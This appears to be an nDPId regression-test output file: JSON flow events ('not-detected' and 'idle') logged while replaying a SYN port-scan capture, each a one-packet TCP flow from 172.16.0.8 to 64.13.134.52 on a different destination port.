-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7435,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":858,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5405,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 